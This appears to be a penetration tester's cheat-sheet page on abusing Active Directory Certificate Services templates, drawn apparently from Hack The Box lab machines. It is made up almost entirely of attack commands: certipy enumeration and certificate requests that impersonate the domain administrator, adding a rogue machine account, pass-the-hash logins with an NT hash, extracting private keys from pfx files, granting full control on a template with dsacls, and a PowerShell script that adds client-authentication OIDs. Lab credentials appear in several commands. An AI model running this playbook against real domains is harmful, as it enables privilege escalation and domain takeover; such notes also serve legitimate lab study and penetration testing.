Certificate Authority Vulnerable Cert

Is it vulnerable?
- certipy-ad find -vulnerable -dc-ip 10.129.228.253 -enabled -u ryan.cooper@sequel.htb -p NuclearMosquito3 Tip: https://github.com/ly4k/Certipy

The vulnerable cert may say that domain computers can enroll or some other computer access as opposed to user access to enroll. In this case you will need a computer account. You can create a computer account for this purpose.

**Find machine account quota nxc ldap authority -u 'svc_ldap' -p 'lDaP_1n_th3_cle4r!' -M MAQ

**Add a computer impacket-addcomputer -method LDAPS -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host authority -domain-netbios 'authority.htb' 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!'

certipy-ad
- certipy-ad req -ca AUTHORITY-CA -target authority.authority.htb -template CorpVPN -upn administrator -username ATTACKERSYSTEM$ -password 'Summer2018!'
- certipy-ad auth -pfx administrator.pfx -username administrator -domain sequel.htb -dc-ip 10.129.228.253
- evil-winrm -u 'administrator' -H a52f78e4c751e5f5e17e1e9f3e58f4ee -i dc or impacket-psexec -hashes a52f78e4c751e5f5e17e1e9f3e58f4ee:a52f78e4c751e5f5e17e1e9f3e58f4ee administrator@dc
certify.exe - [ ] https://github.com/GhostPack/Certify?tab=readme-ov-file#example-walkthrough

**Break out key and pem from pfx WinRM SSL can use certificate authentication

A pfx file will hold the public and private keys.
evil-winrm will requires these to be separated into respective files pub priv files
openssl pkcs12 -in file.pfx -info
pfx2john
Extract priv keys: openssl pkcs12 -in file.pfx -nocerts -out privkey.pem -nodes
Extract pub keys: openssl pkcs12 -in file.pfx -nokeys -out pubcert.cert
evil-winrm -S -c pubcert.cert -k privkey.pem -i dc01

WriteDacl on Cert

https://github.com/daem0nc0re/Abusing_Weak_ACL_on_Certificate_Templates ldapsearch -LLL -H ldap://htb.local -b 'cn=configuration,dc=htb,dc=local' -D 'amanda@htb.local' -w 'Ashare1972' -s sub '(objectclass=pkicertificatetemplate)' '*'

Set full controll to all users

Do not do this in a pentest. Give rights to a single principal dsacls "CN=SSL,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=HTB,DC=LOCAL" /G "HTB\Domain Users:GA"

Add OIDs

# Import Active Directory Module
Import-Module ActiveDirectory

# Define the distinguished name (DN) of the certificate template
$dn = "CN=SSL,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=HTB,DC=LOCAL"

# Define the application policies to add
$policies = @("1.3.6.1.5.5.7.3.2","1.3.6.1.5.5.7.3.4","1.3.6.1.4.1.311.10.3.4")

# Get the existing application policies (if any)
$currentPolicies = (Get-ADObject -Identity $dn -Properties "msPKI-Certificate-Application-Policy")."msPKI-Certificate-Application-Policy"

# Check if there are any existing policies and merge them with the new ones
if ($currentPolicies -ne $null) {$policies += $currentPolicies | Where-Object { $_ -notin $policies }}

# Update the certificate template with the new application policies
Set-ADObject -Identity $dn -Replace @{ "msPKI-Certificate-Application-Policy" = $policies }

Request the cert

certipy-ad req -u ‘User’ -p 'Password' -ca 'Certificate Authority' -template 'ESC4' -upn ‘User you want the certificate for [Domain Admin]’ -dc-ip ‘Domain Controller IP’

Use the cert to get a tgt

certipy-ad auth -pfx 'The user we got the certificate for [Domain Admin]' -dc-ip 'Domain Controller IP' certipy-ad auth -pfx sizzler.pfx -dc-ip 10.129.71.105 -dns-tcp -ldap-shell

PreviousCertificate Authority create certificate request NextCertificate Found